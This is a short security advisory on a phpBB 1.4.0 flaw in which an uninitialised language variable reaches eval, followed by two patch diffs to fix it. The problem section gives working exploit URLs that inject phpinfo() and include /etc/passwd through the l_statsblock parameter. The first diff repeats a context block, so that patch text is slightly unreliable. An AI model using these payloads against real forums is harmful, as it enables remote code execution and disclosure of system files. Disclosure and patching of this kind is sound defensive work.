COMMAND

    phpBB

SYSTEMS AFFECTED

    phpBB 1.4.0

PROBLEM

    This is  regarding a  phpBB security  hole found  some months  ago
    found  by  "UnderSpell".   He  discovered  a  way  to run any code
    using phpBB.

    The aproach  was very  simple.   At a  given point  you run a eval
    "eval($l_statsblock);".   Since  $l_statsblock  is  a language var
    we just have  to find a  way set up  us with a  invalid lang file:
    after login, go to user prefs and

        http://hacks.phpbb.com/phpBB/prefs.php?viewemail=1&savecookie=0&sig=0&smile=0&dishtml=0&disbbcode=0&themes=2&lang=THIS_IS_AN_INVALID_LANG_FILE&save=1&user=&submit=Gravar+Prefer%EAncias

    By this time $l_statsblock is  no longer initialized so we  can do
    funny stuff whith them, like :

        http://hacks.phpbb.com/phpBB/prefs.php?l_statsblock=phpinfo();

    or

        http://hacks.phpbb.com/phpBB/prefs.php?teste=/etc/passwd&l_statsblock=include($teste);

    and so on  ... we only  check the phpinfo  against hack forum  and
    the second against my production and stagging boards.

SOLUTION

    You have tow ways to fix this :

    1) Check if lang file exists (when tries to include)

    --- phpBB-1.4.0/auth.php        Wed Apr 25 05:47:59 2001
    +++ phpBB/auth.php      Thu May 17 12:11:01 2001
    @@ -273,16 +273,19 @@
      // Include the appropriate language file.
      if(!strstr($PHP_SELF, "admin"))
      {
    -   include('language/lang_'.$default_lang.'.'.$phpEx);
    +   $langfile = 'language/lang_'.$default_lang.'.'.$phpEx;
      }
      else
      {
         if(strstr($PHP_SELF, "topicadmin")) {
    -     include('language/lang_'.$default_lang.'.'.$phpEx);
    -       } else {
    -     include('../language/lang_'.$default_lang.'.'.$phpEx);
    -       }
    +     $langfile ='language/lang_'.$default_lang.'.'.$phpEx;
    +        } else {
    +                $langfile = '../language/lang_'.$default_lang.'.'.$phpEx;
    +        }
      }
    +
    + if ( ! file_exists($langfile) ) { die("Invalid Language");}
    + else { include($langfile); }
    
      // See if translated pictures are available..
      $header_image = get_translated_file($header_image);
    
    
      // See if translated pictures are available..
      $header_image = get_translated_file($header_image);

    2) Initialize $l_statsblock before trying to include (prefered)

    --- phpBB-1.4.0/auth.php        Wed Apr 25 05:47:59 2001
    +++ phpBB/auth.php      Thu May 17 11:39:33 2001
    @@ -269,6 +269,7 @@
      // set vars for all scripts
      $now_time = time();
      $last_visit = $temptime;
    +$l_statsblock = '';
    
      // Include the appropriate language file.
      if(!strstr($PHP_SELF, "admin"))